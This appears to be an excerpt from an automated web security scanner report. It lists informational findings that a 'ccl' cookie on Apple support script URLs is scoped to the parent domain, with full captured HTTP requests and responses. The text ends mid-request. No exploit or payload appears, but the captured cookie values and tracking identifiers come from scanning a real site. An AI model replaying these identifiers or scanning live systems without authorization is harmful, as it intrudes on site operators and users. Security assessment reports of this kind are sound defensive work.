The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=TNR6wRKxYNtzCvSt8e6STR2MqvPvXtpaAgpVqin1Mrk8o+RAX/5mnxfg6ECcROU0uWvpVhMwRgqoY73TaZMS/97b9MnofN0e6hxKOjj84BlV3c79hXWOqUiufCmyOYi7f7qAwdsMjWlA3o0ftcmYcgLz3mc5+tUS1U0SwSrb74xJN/zjHSefbTj0YUDfnOgpnsit8uGMe0qMqRzPmoKqnog9QlgcAKOknndO7TRbN9xMFXxd0OIAsSGJeWZvVdOnWIItMSHHJfq2FWKvVndmcrwXp0Ydz17trZmFToSJMW9eItyrLnehzC08teaShi7psyW8Y59sdfm+eGns1sZEbe7IVI170VNgreznAk7Q3sN9Whg6TEGsreK942FxqPFitCSjJOW4uy3Q/mFvjc+JJGezduu1ZXS8gEwlynuFQ760a3YeGUOK1qPkkKK87YG3BqSDyhqht27HYsgvl+x6NXp/TdrrT2KxVwWmtmdMAz+XS6rag4PmTuJXo1EHG+02z7guaChTesanQfPFdKqlSBRccsJLvIwkdAUp4WzE5hwFttYocu6YTP06Gydhe6zY; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/iknow/scripts/ACShortcuts.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: "e243-4a3dd5fba7e00"
If-Modified-Since: Sun, 22 May 2011 13:31:36 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Sun, 22 May 2011 13:31:36 GMT
ETag: "e243-4a3dd5fba7e00"
Cache-Control: max-age=526
Expires: Thu, 21 Jul 2011 20:40:33 GMT
Date: Thu, 21 Jul 2011 20:31:47 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=TNR6wRKxYNtzCvSt8e6STR2MqvPvXtpaAgpVqin1Mrk8o+RAX/5mnxfg6ECcROU0uWvpVhMwRgqoY73TaZMS/97b9MnofN0e6hxKOjj84BlV3c79hXWOqUiufCmyOYi7f7qAwdsMjWlA3o0ftcmYcgLz3mc5+tUS1U0SwSrb74xJN/zjHSefbTj0YUDfnOgpnsit8uGMe0qMqRzPmoKqnog9QlgcAKOknndO7TRbN9xMFXxd0OIAsSGJeWZvVdOnWIItMSHHJfq2FWKvVndmcrwXp0Ydz17trZmFToSJMW9eItyrLnehzC08teaShi7psyW8Y59sdfm+eGns1sZEbe7IVI170VNgreznAk7Q3sN9Whg6TEGsreK942FxqPFitCSjJOW4uy3Q/mFvjc+JJGezduu1ZXS8gEwlynuFQ760a3YeGUOK1qPkkKK87YG3BqSDyhqht27HYsgvl+x6NXp/TdrrT2KxVwWmtmdMAz+XS6rag4PmTuJXo1EHG+02z7guaChTesanQfPFdKqlSBRccsJLvIwkdAUp4WzE5hwFttYocu6YTP06Gydhe6zY; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.107. http://images.apple.com/support/scripts/AppleCareWeb/Modules/ExpressLane.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/AppleCareWeb/Modules/ExpressLane.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=eBVbIuZddax5/P3IomgWyldw+SNwA80QbPxxZC0jXp5XG2GgBGnQ1zoUpnVSRleUPRAtLBuayMkgZ+hruSg5Yx+bZsDhTRi51J9sQTs+pD51G0pI8vqliot+VI5No+QqQHZxAIdpEWoOv7nilIRsfBiKQ1Er9RXvCnBRJKxlsODtEzNkyr3JPTy7Tw3aDaywAFFQwR0zSNYtNOd/u40BdSN/t3u0kQvs/ZOJBl8uYiaXjU/cREV7qBSnJ+DfojsYTfF1iMX47mmLH9eK7slyHBbV+zjYPgnFIPq/wQ7gq9QvIOdtE0/nAnKnqsyDta97lxEAALu813TmRdKWRpMLXV0uaa0NsbpBl+mbcOuIkY2C27NEj3UsaiW9GsYmaSfMR5WmArz0+/BWo5xY+37q3+UWTRDqEHRFUgj/MBzWWD9mVaHheGMyYBbhxu5HdtUgWkLMx1eyTKf5mnYfqN682909rF+vSYzByk5hKtSvVc8xLL4Rf3jaNEzTdlifyFPsv2qUxaS2ZKJph86yHIea/nLQmx6Prw/zkIfnX2L2Y00F1NGoek/FiKx+Kchn8rev; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/scripts/AppleCareWeb/Modules/ExpressLane.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: "6039-49404931130c0"
If-Modified-Since: Mon, 01 Nov 2010 21:34:35 GMT

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 21 Jul 2011 18:32:40 GMT
ETag: "55b1-4a89892e7c200"
Vary: Accept-Encoding
Cteonnt-Length: 21937
Content-Type: application/x-javascript
Server: Apache/2.2.3 (Oracle)
Content-Length: 21937
Cache-Control: max-age=490
Expires: Thu, 21 Jul 2011 20:39:56 GMT
Date: Thu, 21 Jul 2011 20:31:46 GMT
Connection: close
Set-Cookie: ccl=eBVbIuZddax5/P3IomgWyldw+SNwA80QbPxxZC0jXp5XG2GgBGnQ1zoUpnVSRleUPRAtLBuayMkgZ+hruSg5Yx+bZsDhTRi51J9sQTs+pD51G0pI8vqliot+VI5No+QqQHZxAIdpEWoOv7nilIRsfBiKQ1Er9RXvCnBRJKxlsODtEzNkyr3JPTy7Tw3aDaywAFFQwR0zSNYtNOd/u40BdSN/t3u0kQvs/ZOJBl8uYiaXjU/cREV7qBSnJ+DfojsYTfF1iMX47mmLH9eK7slyHBbV+zjYPgnFIPq/wQ7gq9QvIOdtE0/nAnKnqsyDta97lxEAALu813TmRdKWRpMLXV0uaa0NsbpBl+mbcOuIkY2C27NEj3UsaiW9GsYmaSfMR5WmArz0+/BWo5xY+37q3+UWTRDqEHRFUgj/MBzWWD9mVaHheGMyYBbhxu5HdtUgWkLMx1eyTKf5mnYfqN682909rF+vSYzByk5hKtSvVc8xLL4Rf3jaNEzTdlifyFPsv2qUxaS2ZKJph86yHIea/nLQmx6Prw/zkIfnX2L2Y00F1NGoek/FiKx+Kchn8rev; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

if(typeof AppleCareWeb=='undefined'){AppleCareWeb={}}if(typeof AppleCareWeb.Modules=='undefined'){AppleCareWeb.Modules={}}AppleCareWeb.Modules.ExpressLane=Class.create({"properties":undefined,"initial
...[SNIP]...

10.108. http://images.apple.com/support/scripts/SCReporting.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/SCReporting.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=vieAF8ua3wYA4629WNHOQPzNpLpwVOGsNUO/b2NkvqijTQ2cH+ZC0bfCIJrNcFlW8g+LdVVmUhG8woi3I1iWooPfRZfVnnZHNWc5G7UJhHTnMIFZDUK4bwYy3BCaGYTarC0WWNNAtACV1t8Unx/+VZ3QTHuS2yGrllrOxrYsY8C26d6Ll0C+13apl9kw/WCuct7zr/ZrEJpy90HexZYyOWrNJ4/irxFXKFsl87CE0guKPrG6wSnD/2zjQr3HUQGBmMexb02DPUqxoYmH1xCxZfZEkdZVbRMTx9JvyNZ5+j8a9lOh+mj2OAgRN/5DHSlgEWzmza0xEFlgtw9EmREG+2LTtlaalrRm7x1IlmyFUK56VST+OlsrtC25QQocg6lgE4bLW7/oTXoMYRSNZHpHtZdz8/q7xGk4R5XzCcyjnjYP0Zo0KxVWXlhKcVB+9s9xcmodJZtqCFo97e5mr6brQ2UR+y+24k9nqL0At4Nj6U6Er9BL5NENo0d6jKMazgYDCP4y83PZn6MqpB4qeVwXp7QV08dzNOl8iv48KroBlV3p9igW0zZO4XhCuMyMeP2G; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/scripts/SCReporting.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: "4ffc-4a5c7d4328c00"
If-Modified-Since: Wed, 15 Jun 2011 22:39:44 GMT

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 21 Jul 2011 04:52:33 GMT
ETag: "502f-4a88d1df08640"
Vary: Accept-Encoding
Server: Apache/2.2.3 (Oracle)
ntCoent-Length: 20527
Content-Type: application/x-javascript
X-Cached-Time: Thu, 21 Jul 2011 05:12:28 GMT
Content-Length: 20527
Cache-Control: max-age=426
Expires: Thu, 21 Jul 2011 20:38:53 GMT
Date: Thu, 21 Jul 2011 20:31:47 GMT
Connection: close
Set-Cookie: ccl=vieAF8ua3wYA4629WNHOQPzNpLpwVOGsNUO/b2NkvqijTQ2cH+ZC0bfCIJrNcFlW8g+LdVVmUhG8woi3I1iWooPfRZfVnnZHNWc5G7UJhHTnMIFZDUK4bwYy3BCaGYTarC0WWNNAtACV1t8Unx/+VZ3QTHuS2yGrllrOxrYsY8C26d6Ll0C+13apl9kw/WCuct7zr/ZrEJpy90HexZYyOWrNJ4/irxFXKFsl87CE0guKPrG6wSnD/2zjQr3HUQGBmMexb02DPUqxoYmH1xCxZfZEkdZVbRMTx9JvyNZ5+j8a9lOh+mj2OAgRN/5DHSlgEWzmza0xEFlgtw9EmREG+2LTtlaalrRm7x1IlmyFUK56VST+OlsrtC25QQocg6lgE4bLW7/oTXoMYRSNZHpHtZdz8/q7xGk4R5XzCcyjnjYP0Zo0KxVWXlhKcVB+9s9xcmodJZtqCFo97e5mr6brQ2UR+y+24k9nqL0At4Nj6U6Er9BL5NENo0d6jKMazgYDCP4y83PZn6MqpB4qeVwXp7QV08dzNOl8iv48KroBlV3p9igW0zZO4XhCuMyMeP2G; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

...var SCReporting = {
   'metacontent': '',
   'metaroot': 'acs::web::',
   'pagepath': (location.pathname) ? location.pathname : '',
   'pagetitle': (document.title) ? document.title : '',
   'subdir': '',
   '
...[SNIP]...

10.109. http://images.apple.com/support/scripts/module_decorator.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/module_decorator.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=Wo0u1ZUBlL/aYW9rbxsmQbKE0DRicGsLE9iJgbiunfgOMquJz4iqwXRDuVSvojoGR8zGgfHOElcgTO7x1KZixcXDW8l76BYDwNXz8ePTzrf95uaRtHpSdtdkG5MOQ28Tyad12GBQA7NEbMPVJSuJyPu4mtIsYmLrMvnO5suIskc3518FxTkJZozJZSd05HOvoWfrRYerKLx77h983L6uzhQ4n4WBn5mYhwafiZ/chmQFkNkaJNxXs2sq5OlfekRPR4HP8YoPd1kSjEM+32AfpP6p6hOmXk8O/jNJaTPvPBN5EjMRArwrVDW/N2MQz4dJukN2WxJ1Dm/v0K9DwxwjrjUDw/qdkaKF2I5HTkitEx5jhmjYizB9Rwk9/3vcvFroTLxILt0hoPkdwY7jcaQY9gOmbhI0CGY2DALQZbMIhEbSsmRrE4j5NEQsAtVSrPG+B3pph4gopSS24VcPXkJqkf4HBDkwAvlaC28l7a00uUnknicxWeQzN5LmIdQnJ3YjwhO58sUXGufnIp1915jHk8rg7vIC/lZ/6Q9I/9rXFaLmhd1pn0OgIGr7pys0W1eF; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/scripts/module_decorator.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: "3af-432320581f840"
If-Modified-Since: Wed, 06 Jun 2007 00:38:49 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Wed, 06 Jun 2007 00:38:49 GMT
ETag: "3af-432320581f840"
Cache-Control: max-age=528
Expires: Thu, 21 Jul 2011 20:40:33 GMT
Date: Thu, 21 Jul 2011 20:31:45 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=Wo0u1ZUBlL/aYW9rbxsmQbKE0DRicGsLE9iJgbiunfgOMquJz4iqwXRDuVSvojoGR8zGgfHOElcgTO7x1KZixcXDW8l76BYDwNXz8ePTzrf95uaRtHpSdtdkG5MOQ28Tyad12GBQA7NEbMPVJSuJyPu4mtIsYmLrMvnO5suIskc3518FxTkJZozJZSd05HOvoWfrRYerKLx77h983L6uzhQ4n4WBn5mYhwafiZ/chmQFkNkaJNxXs2sq5OlfekRPR4HP8YoPd1kSjEM+32AfpP6p6hOmXk8O/jNJaTPvPBN5EjMRArwrVDW/N2MQz4dJukN2WxJ1Dm/v0K9DwxwjrjUDw/qdkaKF2I5HTkitEx5jhmjYizB9Rwk9/3vcvFroTLxILt0hoPkdwY7jcaQY9gOmbhI0CGY2DALQZbMIhEbSsmRrE4j5NEQsAtVSrPG+B3pph4gopSS24VcPXkJqkf4HBDkwAvlaC28l7a00uUnknicxWeQzN5LmIdQnJ3YjwhO58sUXGufnIp1915jHk8rg7vIC/lZ/6Q9I/9rXFaLmhd1pn0OgIGr7pys0W1eF; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.110. http://images.apple.com/support/scripts/new_country.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/new_country.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=w4CXT8701a3+jEFsYEy5UUZgzr1bz8Q1S/6GEWWauQ+UuojsHwdRdh8Rh3BiOtlF69bB4dLbDvDXtx3hgjzqhsxH1G7KbQ2QeTtJRXXMtzKdtMGeY2wifVb1RGKkiid9dGve56cj5ixdcLUC6uLiDUNvquCh5Pw7WuLW38n6W8wM/P0L/bKxXDNf/tZobRHDXsl+39dY/DHPbbhSKZK3AMn103V8RV+piUgvsuwUd57tLm0HO2ddf5mtMSyZwCSPe33Yw1QxIu18bQwBHVFFLTtY3G7kwKLbf+GCOM8zoUh6vPGVRkKsnvo8qGrKyMBIdDlklwgbhLRJEOdBXBmcFmboZABBTZhtMfuQCFWVZOUmcePu+79d5UAKzWk5eUxkIOji+3U9aaaa8Vb8uTzKZJIkhFJgftTU46gG9wStWpTchmD8txswZJV3p1FjgrhFtW+Owrb20mYaXtVJN7U3KxuNpn4x97WkHzenwRwHkW+BHMbqNYUl5DzWYBtTgs7UhsoACvBoQ8BaREm04hHc7M737jMHauyYz1o8gGw3niKCuAPC3uhGcJmxqsWKTlpN; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/scripts/new_country.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D
If-None-Match: "c0-4323205913a80"
If-Modified-Since: Wed, 06 Jun 2007 00:38:50 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Wed, 06 Jun 2007 00:38:50 GMT
ETag: "c0-4323205913a80"
Cache-Control: max-age=530
Expires: Thu, 21 Jul 2011 20:40:35 GMT
Date: Thu, 21 Jul 2011 20:31:45 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=w4CXT8701a3+jEFsYEy5UUZgzr1bz8Q1S/6GEWWauQ+UuojsHwdRdh8Rh3BiOtlF69bB4dLbDvDXtx3hgjzqhsxH1G7KbQ2QeTtJRXXMtzKdtMGeY2wifVb1RGKkiid9dGve56cj5ixdcLUC6uLiDUNvquCh5Pw7WuLW38n6W8wM/P0L/bKxXDNf/tZobRHDXsl+39dY/DHPbbhSKZK3AMn103V8RV+piUgvsuwUd57tLm0HO2ddf5mtMSyZwCSPe33Yw1QxIu18bQwBHVFFLTtY3G7kwKLbf+GCOM8zoUh6vPGVRkKsnvo8qGrKyMBIdDlklwgbhLRJEOdBXBmcFmboZABBTZhtMfuQCFWVZOUmcePu+79d5UAKzWk5eUxkIOji+3U9aaaa8Vb8uTzKZJIkhFJgftTU46gG9wStWpTchmD8txswZJV3p1FjgrhFtW+Owrb20mYaXtVJN7U3KxuNpn4x97WkHzenwRwHkW+BHMbqNYUl5DzWYBtTgs7UhsoACvBoQ8BaREm04hHc7M737jMHauyYz1o8gGw3niKCuAPC3uhGcJmxqsWKTlpN; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.111. http://images.apple.com/support/scripts/new_support_coverage/cookies.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/scripts/new_support_coverage/cookies.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=EHAJMB4i5huvSr6bz+eU3pbNX0WmPYP0P+xUTLO2fDw/GlbtYuBHd5jVtRJsn1sMWECvnQ5RRX5q2HikAzmSoKU62TBznh6EjT8LspazqOHvr4AyVuD83EW7Pk0d+lgl409m5IoPbbGL1jwZnoDYm8U1D5WDL2vkedEyYJ0TbabcPjnrFhVyGDx0U58YxX0hySW9B5m0eSCx1x1qQ3KiU1D6Dzhkj39DkLHx5wDZXUJxbkCfjH5/fs5+YK94VhZCWD9CzKTvts9LXR2G9Voe64DY08yM7mm+hodw6B5bkqqpZHPtzv4c3tttImDC6AAGcL2MoXWtCrmdCwQsDVPOj6htB0QvjxmoqAlbM6gZORjPdM/rzJD+2UrMupyGOVepQro7EfPzcHYzm8o88Y5E91m+qO99fn5/G2RO/d9dvHGDUNx66X9sw5etgEyJzA9QEVkPhSini6gnahASZ76iV4oHaf6UDullU+0Oz0THZn/ch13d5uBai/FYRh2gOR4BhTTQqA1F1f/aukQCA/dvJkHOqwF6GwsKRIRcEc30I8zAc8B6an0Bd6fZe+EQE2kq; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/scripts/new_support_coverage/cookies.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; 